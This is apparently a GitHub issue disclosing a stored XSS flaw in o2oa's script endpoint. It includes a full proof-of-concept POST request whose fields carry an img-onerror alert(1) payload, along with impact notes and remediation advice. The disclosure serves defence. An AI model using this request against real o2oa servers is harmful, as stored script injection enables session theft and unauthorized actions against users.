Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Stored XSS in /x_cms_assemble_control/jaxrs/script in o2oa ≤ 10.0-410-g3d5e0d2 #181

New issue
New issue
Open
Open
Stored XSS in /x_cms_assemble_control/jaxrs/script in o2oa ≤ 10.0-410-g3d5e0d2#181
@ez-lbz

Description

@ez-lbz
ez-lbz
opened on Aug 19, 2025

Stored XSS in /x_cms_assemble_control/jaxrs/script in o2oa ≤ 10.0-410-g3d5e0d2

Summary

In o2oa versions up to 10.0-410-g3d5e0d2, the endpoint /x_cms_assemble_control/jaxrs/script is vulnerable to stored cross-site scripting (XSS). The vulnerability exists because user-supplied input, such as personal profile fields, is stored without sanitization and later rendered in the application, allowing persistent execution of malicious scripts.

Exploitation

POC:
POST /x_cms_assemble_control/jaxrs/script?v=develop-10.0-410-3d5e0d2&mehuky1z HTTP/1.1
Host: localhost
sec-ch-ua-platform: "Windows"
Referer: http://localhost/x_desktop/index.html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Origin: http://localhost
Sec-Fetch-Dest: empty
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
Accept-Language: zh-CN
Cookie: x-token=Wrr7kmtfAdF_VIsbJE2G2wzFtw3HHPMzvPAekU6E6zc
Accept: text/html,application/json,*/*
Sec-Fetch-Site: same-origin
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Mode: cors
Authorization: Wrr7kmtfAdF_VIsbJE2G2wzFtw3HHPMzvPAekU6E6zc
sec-ch-ua-mobile: ?0
Content-Length: 357

{
  "name": "\"><img src=1 onerror=alert(1)>",
  "id": "a7a910be-849c-430e-ad32-74f2f6682ed7",
  "alias": "\"><img src=1 onerror=alert(1)>",
  "description": "\"><img src=1 onerror=alert(1)>",
  "language": "javascript",
  "dependScriptList": [],
  "isNewScript": true,
  "text": "",
  "validated": true,
  "appId": "c5cbc57e-b5cb-458b-99fd-9d7e06f6f842"
}
Image

When the profile is viewed, the stored payload is executed, confirming XSS.

Image

Impact

  • Persistent JavaScript execution in victim browsers

  • Possible theft of session tokens or sensitive user data

  • Unauthorized actions performed on behalf of authenticated users

Remediation

Filter and escape user input in profile fields before storage and ensure proper output encoding when rendering data.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions